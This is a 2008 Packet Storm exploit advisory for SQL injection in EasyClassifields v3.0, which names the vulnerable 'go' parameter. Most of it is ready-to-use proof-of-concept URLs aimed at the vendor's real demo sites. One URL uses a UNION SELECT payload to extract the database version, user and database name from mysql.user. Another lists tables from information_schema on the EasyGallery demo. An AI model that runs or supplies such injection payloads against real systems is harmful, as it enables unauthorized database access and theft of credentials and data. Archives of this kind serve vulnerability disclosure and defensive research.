easyclassifieds-sql.txt

2008-09-03T00:00:00
ID PACKETSTORM:69544
Type packetstorm
Reporter e.wiZz!
Modified 2008-09-03T00:00:00

Description

                                        
                                            `##############EasyClassifields v3.0 SQL Injection#######################  
  
####By: e.wiZz!  
####Info: Bosnian Idiot FTW!  
####Site: infected.blogger.ba  
####Greetz: Luigi,suN8Hclf  
In the wild...  
  
##################################################################  
  
###Script Site: http://myiosoft.com/?1.6.0.0  
###Vulnerability:  
  
http://www.inthewild.xxx/path/index.php?PageSection=x&page=browse&go=<sql>  
  
PoC on demo site:  
  
http://myiosoft.com/products/EasyClassifields/demo/staticpages/easyclassifields/index.php?PageSection=0&page=browse&go=-1%20union%20select%20all%20concat(0x3a,version(),0x3a,user(),0x3a,0x3a,database()),2%20from%20mysql.user  
  
  
http://myiosoft.com/  
  
http://myiosoft.com/products/EasyGallery/demo/staticpages/easygallery/index.php?PageSection=0&page=category&catid=-1%20union%20all%20select%20table_name from information_schema.tables`